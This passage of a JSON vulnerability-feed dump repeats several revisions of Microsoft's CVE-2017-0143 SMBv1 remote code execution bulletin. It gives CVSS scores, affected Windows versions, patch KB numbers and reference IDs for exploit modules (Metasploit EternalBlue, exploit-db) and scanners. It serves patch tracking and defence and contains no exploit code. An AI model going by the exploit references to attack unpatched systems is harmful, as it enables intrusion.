"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:23", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-29T10:45:17", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3210720", "KB3212646", "KB4012215", "KB4012216", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012217", "KB4013198", "KB3177186", "KB4012212", "KB3205409", "KB4012598", "KB3205401", "KB3213986", "KB4012213", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:45:17", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-30T06:48:04", "history": [], "viewCount": 10, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3213986", "KB4012606", "KB4013429", "KB3177186", "KB4012598", "KBMS16-110, 3187754", "KB4012212", "KB4013198", "KB3205409", "KB4012216", "KB3212646", "KB4012215", "KB4012217", "KB3205401", "KB4012214", "KB3210721", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:04", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-30T20:47:04", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", 